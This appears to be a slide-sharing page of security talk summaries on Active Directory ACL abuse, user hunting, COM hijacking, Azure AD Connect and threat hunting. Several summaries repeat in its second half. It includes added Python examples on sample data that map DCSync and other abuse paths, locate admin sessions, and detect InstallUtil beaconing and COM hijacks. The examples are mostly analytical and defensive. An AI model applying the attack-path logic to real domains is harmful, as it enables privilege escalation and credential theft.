PowerShell is often considered a threat vector by security tools like Carbon Black due to its powerful capabilities. However, the presentation argues that PowerShell is not dead and outlines ways attackers have evolved their PowerShell techniques to avoid detection. It demonstrates a C# PowerShell implant that uses reflection to bypass detection and discusses exploiting COM objects and Junction folders to migrate between processes like Internet Explorer.
The Unintended Risks of Trusting Active Directory (Will Schroeder)
This presentation was given at Sp4rkCon 2018. It covers the combination of Active Directory and host-based security descriptor backdooring and the associated security implications.
Here Be Dragons: The Unexplored Land of Active Directory ACLs (Andy Robbins)
This document summarizes information about three individuals - Andy, Rohan, and Will - who work at SpecterOps creating security tools like BloodHound. It provides details on their jobs, tool development experience, conference presentations, training experience, and Twitter accounts. It then outlines abuse primitives that can be exploited through misconfigurations in Active Directory object ACLs. Finally, it demonstrates how to use tools like PowerView, SharpHound, and BloodHound to find misconfigurations and attack paths in Active Directory.
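The abuse primitives the talk describes come straight from the access-mask bits and object-type GUIDs in an object's DACL. The following is an added example (not code from the talk, PowerView or BloodHound) that classifies ACEs into those primitives the way SharpHound does and filters out principals that are expected to hold rights. The domain SID, DNs, RIDs and ACEs are constructed sample data; the access-mask constants and rightsGuid values are the real Windows/AD values.

```python
from dataclasses import dataclass

# Access-mask bits (ADS_RIGHTS_ENUM / winnt.h).
GENERIC_ALL                 = 0x10000000
GENERIC_WRITE               = 0x40000000
WRITE_DAC                   = 0x00040000
WRITE_OWNER                 = 0x00080000
ADS_RIGHT_DS_CONTROL_ACCESS = 0x00000100   # extended right; object_type names which one
ADS_RIGHT_DS_WRITE_PROP     = 0x00000020   # write property; object_type names which attribute
ADS_RIGHT_DS_SELF           = 0x00000008   # validated write (e.g. Self-Membership)

# Schema / rightsGuid values the primitives key on.
GUID_ALL                  = "00000000-0000-0000-0000-000000000000"  # ACE not scoped to an object type
GUID_FORCE_CHANGE_PW      = "00299570-246d-11d0-a768-00aa006e0529"  # User-Force-Change-Password
GUID_MEMBER_ATTR          = "bf9679c0-0de6-11d0-a285-00aa003049e2"  # 'member' attribute
GUID_REPL_GET_CHANGES     = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"  # DS-Replication-Get-Changes
GUID_REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"  # DS-Replication-Get-Changes-All


@dataclass(frozen=True)
class Ace:
    """One ACCESS_ALLOWED(_OBJECT) ACE as read off an object's DACL."""
    target_dn: str                 # object the ACE lives on
    trustee_sid: str               # principal that receives the right
    access_mask: int
    object_type: str = GUID_ALL    # rightsGuid / attribute GUID, or GUID_ALL


def classify(ace):
    """Map one ACE to the BloodHound-style abuse primitives it grants."""
    m, g = ace.access_mask, ace.object_type.lower()
    if m & GENERIC_ALL:
        return ["GenericAll"]                       # everything below is implied
    found = []
    if m & WRITE_DAC:
        found.append("WriteDacl")                   # rewrite the DACL, then grant yourself anything
    if m & WRITE_OWNER:
        found.append("WriteOwner")                  # take ownership, then WriteDacl
    if m & GENERIC_WRITE:
        found.append("GenericWrite")                # all attributes: scriptPath, SPNs, member, ...
    if m & ADS_RIGHT_DS_CONTROL_ACCESS:
        if g == GUID_ALL:
            found.append("AllExtendedRights")
        elif g == GUID_FORCE_CHANGE_PW:
            found.append("ForceChangePassword")
        elif g == GUID_REPL_GET_CHANGES:
            found.append("GetChanges")
        elif g == GUID_REPL_GET_CHANGES_ALL:
            found.append("GetChangesAll")
    if m & (ADS_RIGHT_DS_WRITE_PROP | ADS_RIGHT_DS_SELF) and g in (GUID_ALL, GUID_MEMBER_ATTR):
        found.append("AddMember")                   # write 'member' on a group
    return found


def is_expected_admin(sid, domain_sid):
    """PowerView's heuristic: default and built-in principals have RID < 1000
    (Domain Admins 512, Enterprise Admins 519, ...) or live outside the domain
    SID (SYSTEM, BUILTIN\\Administrators). Their rights are by design."""
    if not sid.startswith(domain_sid + "-"):
        return True
    return int(sid.rsplit("-", 1)[1]) < 1000


def find_abusable(aces, domain_sid):
    """Return sorted (trustee, primitive, target) edges for non-default trustees.
    GetChanges + GetChangesAll on the same object are combined into DCSync."""
    edges, repl = set(), {}
    for ace in aces:
        if is_expected_admin(ace.trustee_sid, domain_sid):
            continue
        for prim in classify(ace):
            if prim in ("GetChanges", "GetChangesAll"):
                repl.setdefault((ace.trustee_sid, ace.target_dn), set()).add(prim)
            else:
                edges.add((ace.trustee_sid, prim, ace.target_dn))
    for (sid, dn), rights in repl.items():
        if rights == {"GetChanges", "GetChangesAll"}:
            edges.add((sid, "DCSync", dn))          # enough to pull every hash over DRSUAPI
    return sorted(edges)


# Constructed sample DACL entries (hypothetical domain, users and groups).
DOMAIN_SID = "S-1-5-21-1111111111-2222222222-3333333333"
DOMAIN_DN = "DC=corp,DC=local"
DA_DN = "CN=Domain Admins,CN=Users," + DOMAIN_DN
SAMPLE_ACES = [
    Ace(DOMAIN_DN, DOMAIN_SID + "-512", GENERIC_ALL),                                             # Domain Admins: expected
    Ace(DOMAIN_DN, DOMAIN_SID + "-1322", ADS_RIGHT_DS_CONTROL_ACCESS, GUID_REPL_GET_CHANGES),      # svc_backup
    Ace(DOMAIN_DN, DOMAIN_SID + "-1322", ADS_RIGHT_DS_CONTROL_ACCESS, GUID_REPL_GET_CHANGES_ALL),  # svc_backup
    Ace("CN=bob,CN=Users," + DOMAIN_DN, DOMAIN_SID + "-1105", ADS_RIGHT_DS_CONTROL_ACCESS, GUID_FORCE_CHANGE_PW),  # helpdesk
    Ace(DA_DN, DOMAIN_SID + "-1201", WRITE_DAC | WRITE_OWNER),                                    # jdoe
    Ace(DA_DN, DOMAIN_SID + "-1450", ADS_RIGHT_DS_WRITE_PROP, GUID_MEMBER_ATTR),                  # GroupOps group
    Ace(DA_DN, "S-1-5-18", GENERIC_ALL),                                                          # SYSTEM: expected
]

if __name__ == "__main__":
    for trustee, primitive, target in find_abusable(SAMPLE_ACES, DOMAIN_SID):
        print(f"{trustee}  --{primitive}-->  {target}")
```

Two things the sample shows that a raw ACL dump hides: the backup service account holds DCSync on the domain head only because two separate extended-right ACEs combine, and the RID filter is what keeps Domain Admins and SYSTEM out of the findings. Against a real domain, feed it the ACEs from `Get-DomainObjectAcl -ResolveGUIDs` (PowerView) and remember that inherited ACEs and deny ACEs need the same treatment.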
COM Hijacking Techniques - Derbycon 2019 (David Tulis)
The COM interface lies at the core of Windows, and subtle registry changes can interfere with the OS in unexpected ways. COM hijacking allows an attacker to load a library into a calling COM-enabled process. It's a feature, not a bug. While it is commonly used for persistence, some famous COM hijacks have led to more severe exploits. COM hijacking is already used by several families of malware, and it's time that pentesters caught up on how to abuse this feature. This presentation will cover COM hijacking from start to finish: how to discover hijackable COM objects, how to use them offensively, and how to keep the calling process stable. The blue team will not be forgotten; the talk will cover detection strategies for identifying and defending against COM hijacks.
Scott Sutherland discusses penetration testing thick applications. He explains why these applications create unique risks compared to web applications due to users having full control over the application environment. This allows attacks on trusted components, exposure of data and admin functions, and privilege escalation. Sutherland outlines the goals and process for testing thick applications, including common architectures, accessing the application, and testing the application's GUI, files, registry, network traffic, memory, and configurations to identify vulnerabilities.
A look into exploiting LOLDriver vulnerabilities and adapting techniques utilized by unsigned driver loaders coming from the gaming community to create a new class of LOLDriver exploitation not currently seen in the penetration testing / red teaming communities.
2017 Secure360 - Hacking SQL Server on Scale with PowerShell (Scott Sutherland)
The document discusses hacking SQL Server at scale using PowerShell. It provides an overview of PowerUpSQL, an open source PowerShell toolkit for SQL Server discovery, auditing, and privilege escalation. Key sections include SQL Server discovery techniques using PowerUpSQL, methods for escalating privileges such as from a domain user to SQL login or SQL login to sysadmin, and post-exploitation activities like impersonation. The presentation emphasizes the benefits of using PowerShell for SQL attacks including avoiding detection by running commands in memory and leveraging existing trusted tools.
This document provides an introduction to red team operations from the perspective of a penetration tester transitioning to become a red teamer. It discusses some of the key differences between penetration testing and red teaming such as scope, reconnaissance required, stealth, and infrastructure setup. The document outlines principles for red team operations including protecting infrastructure, logging everything, managing information, and avoiding detection. It also provides examples of tactics, techniques and procedures used in red team operations as well as considerations for tools like Cobalt Strike to help evade detection.
This document discusses techniques for threat hunting on Windows systems. It covers key areas to focus on during incident triage like processes, network connections, filesystem artifacts and logs. It also describes general hunting scenarios with and without threat intelligence. Specific techniques and artifacts discussed include the Windows Task Scheduler, ShimCache, AmCache, RecentFileCache, rogue services, timeline analysis using the MFT, DLL side loading, DLL injection rootkits, autoruns, and the WDigest credential storage downgrade attack. The document provides details on what to look for and analyze to effectively hunt for threats on Windows.
Delivered a 1-day Practical Threat Hunting workshop at sacon.io in Bangalore, India, balancing developing a threat hunting program in an organization (how and where to start) with threat hunting demos as they would look on the ground, with hands-on labs for 100+ participants.
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di... (Dirk-jan Mollema)
Azure AD is everything but a domain controller in the cloud. This talk will cover what Azure AD is, how it is commonly integrated with Active Directory and how security boundaries extend into the cloud, covering sync account password recovery, privilege escalations in Azure AD and full admin account takeovers using limited on-premise privileges.
While Active Directory has been researched for years and the security boundaries and risks are generally well documented, more and more organizations are extending their network into the cloud. A prime example of this is Office 365, which Microsoft offers through their Azure cloud. Connecting the on-premise Active Directory with the cloud introduces new attack surface both for the cloud and the on-premise directory.
This talk looks at the way the trust between Active Directory and Azure is set up and can be abused through the Azure AD Connect tool. We will dive into how the synchronization is set up, how the high-privilege credentials for both the cloud and Active Directory are protected (and can be obtained), and what permissions are associated with these accounts.
The talk will outline how a zero day in common setups was discovered through which on-premise users with limited privileges could take over the highest administration account in Azure and potentially compromise all cloud assets.
We will also take a look at the Azure AD architecture and common roles, and how attackers could backdoor or escalate privileges in cloud setups.
Lastly we will look at how to prevent these kinds of attacks and why your AD Connect server is perhaps one of the most critical assets in the on-premise infrastructure.
The document provides an overview of a red team consultant's methodology for penetration testing engagements. It discusses various stages of an engagement including pre-engagement reconnaissance using tools like LinkedIn and domain research. It covers external testing techniques like NTLM brute forcing. Internal testing focuses on privilege escalation using tools like Mimikatz and lateral movement using techniques like DLL hijacking. Reporting emphasizes providing a full narrative and findings of high quality over large quantities.
Upping the APT hunting game: learn the best YARA practices from Kaspersky
Have you ever wondered how Kaspersky discovered some of the world’s most famous APT attacks? Now, the answer is within your reach. Costin Raiu, director of Kaspersky’s Global Research and Analysis Team (GReAT), will be sharing best practices on the use of YARA, an essential tool for APT hunters that can assist with the discovery of new malware samples, exploits and zero-days, speed up incident response, and increase your defenses by deploying custom rules inside your organization.
If you ever wanted to master YARA and achieve a new level of knowledge in APT detection, mitigation and response, now is your chance.
This brief webinar is based on Kaspersky's exclusive training on YARA rules, which has already helped improve the APT detection strategies of many cybersecurity teams from leading businesses across the world. During the webinar, you will learn how to write, test and improve effective YARA rules. You will also get a glimpse of some of our internal tools and learn how to maximize your knowledge for building effective APT detection strategies with YARA.
This practical webinar is useful for security researchers and incident response personnel, malware analysts, security engineers, network security analysts, APT researchers and IT security staff. The content is suitable for both beginners and seasoned YARA users. The full webinar can be seen: https://kas.pr/92tr
This document discusses techniques for hunting down target users on Windows domains after gaining initial access. It begins by outlining existing tools like psloggedon.exe and netsess.exe that can detect logged-in users but typically require administrator privileges. It then explores using domain data sources and PowerShell with tools like PowerView to profile and locate target users throughout the domain without administrator privileges. Various PowerShell commands like Invoke-UserHunter, Invoke-UserView, and Invoke-UserEventHunter are demonstrated for efficiently finding sessions and events associated with target users.
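The trick behind Invoke-UserHunter is that the domain tells you who the targets are (group membership, expanded through nesting) and the file servers tell you where they are: the session list a server returns through NetSessionEnum includes the client host each user connected from, so you learn the target's workstation without touching the workstation. The block below is an added example of that correlation, not PowerView code; the group tree and session lists are constructed sample data standing in for LDAP `member` attributes and NetSessionEnum level-10 output.

```python
# Constructed sample data (hypothetical domain).
GROUPS = {                       # group -> direct members; names that are keys here are nested groups
    "Domain Admins": ["alice", "Tier0 Ops"],
    "Tier0 Ops": ["bob", "Backup Admins"],
    "Backup Admins": ["carol", "Tier0 Ops"],   # cycle on purpose: real AD has them
}
SESSIONS = {                     # file server -> [(username, client host)] as NetSessionEnum reports them
    "FS01": [("alice", "WS-ALICE"), ("dave", "WS-DAVE")],
    "FS02": [("carol", "WS-CAROL"), ("bob", "WS-BOB"), ("alice", "WS-ALICE")],
}


def expand_group(group, groups):
    """Resolve a group's user members recursively; tolerates nested cycles."""
    users, seen, stack = set(), set(), [group]
    while stack:
        g = stack.pop()
        if g in seen:
            continue
        seen.add(g)
        for member in groups.get(g, []):
            if member in groups:
                stack.append(member)      # nested group: expand later
            else:
                users.add(member)
    return users


def hunt_sessions(target_group, groups, sessions):
    """Return (target users, {user: set of client hosts they have sessions from})."""
    targets = expand_group(target_group, groups)
    located = {}
    for server, entries in sessions.items():
        for user, client in entries:
            if user in targets:
                # the client field is where the user actually sits; the
                # server just told us about it
                located.setdefault(user, set()).add(client)
    return targets, located


if __name__ == "__main__":
    targets, located = hunt_sessions("Domain Admins", GROUPS, SESSIONS)
    print("targets:", sorted(targets))
    for user in sorted(located):
        print(f"{user} -> {sorted(located[user])}")
```

In the sample, carol only reaches Domain Admins through two levels of nesting and a cycle, and she is located purely from FS02's session table. Note the caveat the talk's era did not have to worry about: newer Windows builds (and the Net Cease hardening) restrict NetSessionEnum to administrators by default, which is why Invoke-UserHunter falls back to other data sources.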
This presentation will provide an overview of what a penetration test is, why companies pay for them, and what role they play in most IT security programs. It will also include a brief overview of the common skill sets and tools used by today’s security professionals. Finally, it will offer some basic advice for getting started in penetration testing. This should be interesting to aspiring pentesters trying to gain a better understanding of how penetration testing fits into the larger IT security world.
Additional resources can be found in the blog below:
https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers
More security blogs by the authors can be found @
https://www.netspi.com/blog/
Windows privilege escalation by Dhruv Shah (OWASP Delhi)
Different scenarios leading to privilege escalation
Design issues, implementation flaws, untimely system updates, permission issues, etc.
We ain't talking about overflows here, just logic and techniques
MacOS forensics and anti-forensics (DC Lviv 2019) presentation (Oleh Levytskyi)
MacOS forensics and anti-forensics (DC Lviv 2019) presentation. Prepared specially for DC38032. Prepared by Oleh Levytskyi (https://twitter.com/LeOleg97)
Fantastic Red Team Attacks and How to Find Them (Ross Wolf)
Presented at Black Hat 2019
https://www.blackhat.com/us-19/briefings/schedule/index.html#fantastic-red-team-attacks-and-how-to-find-them-16540
Casey Smith (Red Canary)
Ross Wolf (Endgame)
bit.ly/fantastic19
Abstract:
Red team testing in organizations over the last year has shown a dramatic increase in detections mapped to MITRE ATT&CK™ across Windows, Linux and macOS. However, many organizations continue to miss several key techniques that, unsurprisingly, often blend in with day-to-day user operations. One example is Trusted Developer Utilities, which can be readily available on standard user endpoints, not just developer workstations, and which allow code execution. Also, XSL script processing can be used as an attack vector, as a number of trusted utilities can consume and execute scripts via XSL. And finally, in addition to these techniques, trusted .NET default binaries are known to allow unauthorized execution as well; these include tools like InstallUtil, Regsvcs and AddInProcess. Specific techniques, coupled with procedural difficulties within a team, such as alert fatigue and lack of understanding of environmental norms, make reliable detection of these events near impossible.
This talk summarizes prevalent and ongoing gaps across organizations uncovered by testing their defenses against a broad spectrum of attacks via Atomic Red Team. Many of these adversary behaviors are not atomic, but span multiple events in an event stream that may be arbitrarily and inconsistently separated in time by nuisance events.
Additionally, we introduce and demonstrate the open-sourced Event Query Language for creating high signal-to-noise analytics that close these prevalent behavioral gaps. EQL is event agnostic and can be used to craft analytics that readily link evidence across long sequences of log data. In a live demonstration, we showcase powerful but easy to craft analytics that catch adversarial behavior most commonly missed in organizations today.
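The abstract's point is that the missed behaviours are not single events but short sequences separated by noise, which is what EQL's `sequence by <field> with maxspan=<t>` expresses. The block below is an added example, not Endgame's EQL engine: a small matcher with those semantics, run over constructed process/file/network events to catch one of the techniques named above, a trusted .NET host binary (InstallUtil, Regsvcs, MSBuild, AddInProcess) followed by an outbound connection from the same process. Event shapes, pids and addresses are hypothetical.

```python
# Trusted .NET binaries the abstract names as code-execution hosts, lower-cased.
TRUSTED_DOTNET_HOSTS = {"installutil.exe", "regsvcs.exe", "regasm.exe",
                        "msbuild.exe", "addinprocess.exe"}


def sequence_by(events, stages, join_key, maxspan):
    """EQL-style `sequence by join_key with maxspan`.

    stages: list of predicates, one per stage, in order.
    Returns completed chains (lists of events). Events that match no stage
    are nuisance events and are skipped; a partial chain older than maxspan
    is discarded rather than completed."""
    partial, matches = {}, []
    for ev in sorted(events, key=lambda e: e["ts"]):
        key = ev.get(join_key)
        if key is None:
            continue
        chain = partial.get(key, [])
        if chain and ev["ts"] - chain[0]["ts"] > maxspan:
            chain = []                        # window expired: drop the partial match
        if stages[len(chain)](ev):
            chain = chain + [ev]
            if len(chain) == len(stages):
                matches.append(chain)
                chain = []
        partial[key] = chain
    return matches


def detect_dotnet_host_beacons(events, maxspan=30):
    """sequence by pid with maxspan
         [process where name in TRUSTED_DOTNET_HOSTS]
         [network where true]"""
    stages = [
        lambda e: e["category"] == "process" and e.get("name", "").lower() in TRUSTED_DOTNET_HOSTS,
        lambda e: e["category"] == "network",
    ]
    return [(c[0]["pid"], c[0]["name"], c[1]["dest"])
            for c in sequence_by(events, stages, "pid", maxspan)]


# Constructed event stream (timestamps in seconds; addresses from RFC 5737 test ranges).
SAMPLE_EVENTS = [
    {"ts": 100, "category": "process", "pid": 4100, "name": "InstallUtil.exe",
     "cmdline": r"InstallUtil.exe /logfile= /LogToConsole=false /U C:\Users\dev\a.dll"},
    {"ts": 101, "category": "file",    "pid": 4100, "path": r"C:\Users\dev\a.InstallLog"},  # nuisance
    {"ts": 105, "category": "network", "pid": 4100, "dest": "203.0.113.7:443"},
    {"ts": 200, "category": "process", "pid": 5200, "name": "msbuild.exe", "cmdline": "msbuild.exe build.xml"},
    {"ts": 260, "category": "network", "pid": 5200, "dest": "198.51.100.9:80"},   # 60 s later: outside maxspan
    {"ts": 300, "category": "process", "pid": 6300, "name": "notepad.exe"},
    {"ts": 301, "category": "network", "pid": 6300, "dest": "203.0.113.7:443"},   # stage 1 never matched
]

if __name__ == "__main__":
    for pid, name, dest in detect_dotnet_host_beacons(SAMPLE_EVENTS):
        print(f"pid {pid}: {name} connected to {dest}")
```

The maxspan is the tuning knob the abstract alludes to with "environmental norms": MSBuild on a build server connects to package feeds all day, so in that environment you would either widen the stages (parent process, user, destination not in the feed allow-list) or scope the analytic to endpoints where no build ever runs.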
Given at BSides Nashville 2017. The modern Windows operating system carries with it an incredible amount of legacy code. The Component Object Model (COM) has left a lasting impact on Windows. This technology is far from dead, as it continues to be the foundation for many aspects of the Windows operating system. You can find hundreds of COM classes defined by CLSID (COM class identifier). Do you know what they do? This talk seeks to expose tactics long forgotten by the modern defender. We seek to bring to light artifacts in the Windows OS that can be used for persistence. We will present novel tactics for persistence using only the registry and COM objects.
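Both COM talks above (the Derbycon 2019 hijacking talk and this BSides Nashville persistence talk) rest on one registry fact: for a non-elevated process, the COM loader consults `HKCU\Software\Classes\CLSID\{clsid}` before `HKLM\Software\Classes\CLSID\{clsid}`, so a per-user InprocServer32, LocalServer32 or TreatAs entry wins, and a CLSID whose HKLM server binary is gone is a hijack waiting for a file drop. The block below is an added example of the defender-side check, not code from either talk: it runs over a constructed registry snapshot (a dict of key paths to values, as you would build from `reg export`) and a constructed list of files on disk. The CLSIDs and paths are hypothetical.

```python
import re

CLSID_KEY = re.compile(
    r"^(HKCU|HKLM)\\Software\\Classes\\CLSID\\(\{[0-9A-F-]{36}\})\\(InprocServer32|LocalServer32|TreatAs)$",
    re.I)
# Locations a standard user can write to; a COM server living here is attacker-controlled.
USER_WRITABLE = re.compile(r"^(%APPDATA%|%LOCALAPPDATA%|%TEMP%|%USERPROFILE%|C:\\Users\\)", re.I)


def server_path(value):
    """Binary from a server value. LocalServer32 often carries arguments
    ('"C:\\x\\y.exe" /automation'); unquoted values are taken whole."""
    v = value.strip()
    if v.startswith('"'):
        return v[1:v.index('"', 1)]
    return v


def index_clsids(registry):
    """Group the snapshot by CLSID: {clsid: {hive: {subkey: default value}}}."""
    out = {}
    for key, values in registry.items():
        m = CLSID_KEY.match(key)
        if m:
            hive, clsid, sub = m.group(1).upper(), m.group(2).upper(), m.group(3)
            out.setdefault(clsid, {}).setdefault(hive, {})[sub] = values.get("", "")
    return out


def com_hijack_findings(registry, existing_files):
    """Return sorted (clsid, location, value, reason) tuples.
    existing_files stands in for a disk check; expand %VAR% paths first in real use."""
    findings = []
    files = {f.lower() for f in existing_files}
    for clsid, hives in index_clsids(registry).items():
        user, machine = hives.get("HKCU", {}), hives.get("HKLM", {})
        for sub in ("InprocServer32", "LocalServer32"):
            if sub in user:
                # per-user server: loaded instead of the HKLM one (medium integrity only)
                reason = "shadows HKLM server" if sub in machine else "no HKLM counterpart (phantom CLSID)"
                if USER_WRITABLE.match(server_path(user[sub])):
                    reason += ", server in user-writable path"
                findings.append((clsid, "HKCU " + sub, user[sub], reason))
            if sub in machine and server_path(machine[sub]).lower() not in files:
                findings.append((clsid, "HKLM " + sub, machine[sub],
                                 "server binary missing; hijackable if path is writable"))
        if "TreatAs" in user:
            findings.append((clsid, "HKCU TreatAs", user["TreatAs"], "per-user redirection to another CLSID"))
    return sorted(findings)


# Constructed registry snapshot and file list (hypothetical CLSIDs and paths).
SAMPLE_REGISTRY = {
    r"HKLM\Software\Classes\CLSID\{11111111-1111-1111-1111-111111111111}\InprocServer32":
        {"": r"C:\Windows\System32\legit.dll", "ThreadingModel": "Both"},
    r"HKCU\Software\Classes\CLSID\{11111111-1111-1111-1111-111111111111}\InprocServer32":
        {"": r"%APPDATA%\evil.dll", "ThreadingModel": "Both"},          # classic hijack
    r"HKLM\Software\Classes\CLSID\{22222222-2222-2222-2222-222222222222}\InprocServer32":
        {"": r"C:\Program Files\OldApp\gone.dll"},                      # abandoned registration
    r"HKCU\Software\Classes\CLSID\{33333333-3333-3333-3333-333333333333}\TreatAs":
        {"": "{44444444-4444-4444-4444-444444444444}"},                 # per-user redirect
    r"HKLM\Software\Classes\CLSID\{55555555-5555-5555-5555-555555555555}\LocalServer32":
        {"": r'"C:\Program Files\Good\good.exe" /automation'},          # healthy entry
}
SAMPLE_FILES = [r"C:\Windows\System32\legit.dll", r"C:\Program Files\Good\good.exe"]

if __name__ == "__main__":
    for clsid, where, value, reason in com_hijack_findings(SAMPLE_REGISTRY, SAMPLE_FILES):
        print(f"{clsid} {where} = {value}\n    {reason}")
```

Two caveats for the blue team: elevated (high-integrity) processes do not honour per-user COM registrations, so the HKCU findings only affect medium-integrity hosts, and a snapshot is a point-in-time view; for continuous coverage, watch for creation of `CLSID\{...}\InprocServer32` and `TreatAs` keys under HKCU with Sysmon registry events (IDs 12 and 13).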
Empowering red and blue teams with OSINT - c0c0n 2017 (reconvillage)
This talk will discuss Open Source Intelligence (OSINT) gathering tools and techniques that are highly useful and effective for both Blue teams and Red teams.
The document discusses the OWASP Top Ten project, which identifies the 10 most critical web application security risks. It provides an overview of OWASP, describes the Top 10 risks from 2013 and 2017, and explains changes between the two versions. For each risk, it gives a brief example and recommendations for prevention. The key topics covered are injection, broken authentication, sensitive data exposure, XML external entities, broken access control, security misconfiguration, cross-site scripting, insecure deserialization, use of vulnerable components, and insufficient logging/monitoring.
Social Engineering the Windows Kernel by James Forshaw (Shakacon)
One successful technique in social engineering is pretending to be someone or something you're not and hoping the security guard who's forgotten their reading glasses doesn't look too closely at your fake ID. Of course there's no hyperopic guard in the Windows OS, but we do have an ID card, the Access Token, which proves our identity to the system and lets us access secured resources.
The Windows kernel provides simple capabilities to identify fake Access Tokens, but sometimes the kernel or other kernel-mode drivers are too busy to use them correctly. If a fake token isn't spotted during a privileged operation, local elevation of privilege or information disclosure vulnerabilities can be the result. This could allow an attacker to break out of an application sandbox, elevate to administrator privileges or even compromise the kernel itself.
This presentation is about finding and then exploiting the incorrect handling of tokens in the Windows kernel as well as first- and third-party drivers. Examples of serious vulnerabilities such as CVE-2015-0002 and CVE-2015-0062 will be presented. It will provide clear exploitable patterns so that you can do your own security reviews for these issues. Finally I'll discuss some of the ways of exploiting these types of vulnerabilities to elevate local privileges.
The document discusses various topics related to .NET Framework and C#. It provides definitions of concepts like framework, CLR, and comparisons between C# and other languages. It also includes code examples in C# and Java for calculating directory size recursively. Quizzes are included to test understanding.
Runtime Environment Of .Net - Divya Rathore (Esha Yadav)
The document discusses the .NET Framework and how it aims to unify programming models, simplify development, and introduce a common language runtime. It covers the design goals of the CLR including making development and deployment easier while providing a robust and secure execution environment. Examples are provided of how tasks like splitting a string that were complex in SQL can be simplified with the .NET Framework.
A look into exploiting LOLDriver vulnerabilities and adapting techniques utilized by unsigned driver loaders coming from the gaming community to create a new class of LOLDriver exploitation not currently seen in the penetration testing / red teaming communities.
2017 Secure360 - Hacking SQL Server on Scale with PowerShellScott Sutherland
The document discusses hacking SQL Server at scale using PowerShell. It provides an overview of PowerUpSQL, an open source PowerShell toolkit for SQL Server discovery, auditing, and privilege escalation. Key sections include SQL Server discovery techniques using PowerUpSQL, methods for escalating privileges such as from a domain user to SQL login or SQL login to sysadmin, and post-exploitation activities like impersonation. The presentation emphasizes the benefits of using PowerShell for SQL attacks including avoiding detection by running commands in memory and leveraging existing trusted tools.
This document provides an introduction to red team operations from the perspective of a penetration tester transitioning to become a red teamer. It discusses some of the key differences between penetration testing and red teaming such as scope, reconnaissance required, stealth, and infrastructure setup. The document outlines principles for red team operations including protecting infrastructure, logging everything, managing information, and avoiding detection. It also provides examples of tactics, techniques and procedures used in red team operations as well as considerations for tools like Cobalt Strike to help evade detection.
This document discusses techniques for threat hunting on Windows systems. It covers key areas to focus on during incident triage like processes, network connections, filesystem artifacts and logs. It also describes general hunting scenarios using threat intelligence or without intelligence. Specific techniques and artifacts discussed include the Windows Task Scheduler, ShimCache, AmCache, RecentFileCache, rogue services, timeline analysis using MFT, DLL side loading, DLL injection rootkits, autoruns, and the Wdigest credential storage downgrade attack. The document provides details on what to look for and analyze to effectively hunt for threats on Windows.
Delivered 1 - day Practical Threat Hunting workshop at sacon.io in Bangalore,India balancing on developing the threat hunting program in organization, how and where to start from as well threat hunting demos as it would look on the ground with hands on labs for 100+ participants.
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...DirkjanMollema
Azure AD is everything but a domain controller in the cloud. This talk will cover what Azure AD is, how it is commonly integrated with Active Directory and how security boundaries extend into the cloud, covering sync account password recovery, privilege escalations in Azure AD and full admin account takeovers using limited on-premise privileges.
While Active Directory has been researched for years and the security boundaries and risks are generally well documented, more and more organizations are extending their network into the cloud. A prime example of this is Office 365, which Microsoft offers through their Azure cloud. Connecting the on-premise Active Directory with the cloud introduces new attack surface both for the cloud and the on-premise directory.
This talk looks at the way the trust between Active Directory and Azure is set up and can be abused through the Azure AD Connect tool. We will take a dive into how the synchronization is set up, how the high-privilege credentials for both the cloud and Active Directory are protected (and can be obtained) and what permissions are associated with these accounts.
The talk will outline how a zero day in common setups was discovered through which on-premise users with limited privileges could take over the highest administration account in Azure and potentially compromise all cloud assets.
We will also take a look at the Azure AD architecture and common roles, and how attackers could backdoor or escalate privileges in cloud setups.
Lastly we will look at how to prevent against these kind of attacks and why your AD Connect server is perhaps one of the most critical assets in the on-premise infrastructure.
The document provides an overview of a red team consultant's methodology for penetration testing engagements. It discusses various stages of an engagement including pre-engagement reconnaissance using tools like LinkedIn and domain research. It covers external testing techniques like NTLM brute forcing. Internal testing focuses on privileges escalation using tools like Mimikatz and movement using techniques like DLL hijacking. Reporting emphasizes providing a full narrative and findings of high quality over large quantities.
Upping the APT hunting game: learn the best YARA practices from KasperskyKaspersky
Have you ever wondered how Kaspersky discovered some of the world’s most famous APT attacks? Now, the answer is within your reach. Costin Raiu, director of Kaspersky’s Global Research and Analysis Team (GReAT), will be sharing best practices on the use of YARA, an essential tool for APT hunters that can assist with the discovery of new malware samples, exploits and zero-days, speed up incident response, and increase your defenses by deploying custom rules inside your organization.
If you ever wanted to master YARA and achieve a new level of knowledge in APT detection, mitigation and response, now is your chance.
This brief webinar is based on Kaspersky’s exclusive training on YARA rules, which has already helped improve the APT detection strategies of many cybersecurity teams from leading businesses across the world. During the webinar, you will learn how to write test and improve effective YARA rules. You will also get a glimpse of some of our internal tools and learn how to maximize your knowledge for building effective APT detection strategies with YARA.
This practical webinar is useful for security researchers and incident response personnel, malware analysts, security engineers, network security analysts, APT researchers and IT security staff. The content is suitable for both beginners and seasoned YARA users. The full webinar can be seen: https://kas.pr/92tr
This document discusses techniques for hunting down target users on Windows domains after gaining initial access. It begins by outlining existing tools like psloggedon.exe and netsess.exe that can detect logged-in users but typically require administrator privileges. It then explores using domain data sources and PowerShell with tools like PowerView to profile and locate target users throughout the domain without administrator privileges. Various PowerShell commands like Invoke-UserHunter, Invoke-UserView, and Invoke-UserEventHunter are demonstrated for efficiently finding sessions and events associated with target users.
This presentation will provide an overview of what a penetration test is, why companies pay for them, and what role they play in most IT security programs. It will also include a brief overview of the common skill sets and tools used by today’s security professionals. Finally, it will offer some basic advice for getting started in penetration testing. This should be interesting to aspiring pentesters trying to gain a better understanding of how penetration testing fits into the larger IT security world.
Additional resources can be found in the blog below:
https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers
More security blogs by the authors can be found @
https://www.netspi.com/blog/
Windows privilege escalation by Dhruv ShahOWASP Delhi
Different scenarios leading to privilege escalation
Design issues , implementation flaws, untimely system updates , permission issues etc
We ain’t talking about overflows here , just logics and techniques
MacOS forensics and anti-forensics (DC Lviv 2019) presentationOlehLevytskyi1
MacOS forensics and anti-forensics (DC Lviv 2019) presentation. Prepared specially for DC38032. Prepared by Oleh Levytskyi (https://twitter.com/LeOleg97)
Fantastic Red Team Attacks and How to Find ThemRoss Wolf
Presented at Black Hat 2019
https://www.blackhat.com/us-19/briefings/schedule/index.html#fantastic-red-team-attacks-and-how-to-find-them-16540
